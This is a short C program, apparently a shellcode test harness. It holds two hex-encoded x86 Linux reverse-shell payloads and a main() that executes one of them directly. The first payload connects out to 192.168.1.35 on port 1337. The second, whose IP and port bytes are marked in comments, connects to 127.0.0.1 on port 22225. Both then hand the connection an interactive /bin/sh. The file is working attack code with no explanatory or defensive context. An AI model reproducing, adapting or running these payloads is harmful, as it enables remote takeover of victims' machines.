#include <stdio.h>

char sa[] = 
"\x6A\x00\x6A\x01\x6A\x02\x89\xE1\x6A\x66\x58\xBB\x01\x00\x00\x00\xCD\x80\x50\x5A\xB8"
"\xC0\xA8\x01\x23\x50\xB8\x02\x00\x05\x39\x50\x89\xE3\x6A\x10\x53\x52\x89\xE1\xBB\x03"
"\x00\x00\x00\xB8\x66\x00\x00\x00\xCD\x80\xB9\x03\x00\x00\x00\x49\xB8\x3F\x00\x00\x00"
"\x51\x52\xCD\x80\x75\xF4\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";	

char SC[] = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e"
			"\x68\x7f\x00\x00\x01" //ip
			"\x66\x68\x56\xd1"//port
			"\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87"
			"\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68"
			"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main( void )
{
    void( *shell)() = (void*)&SC;
    shell();
    return 0;
}
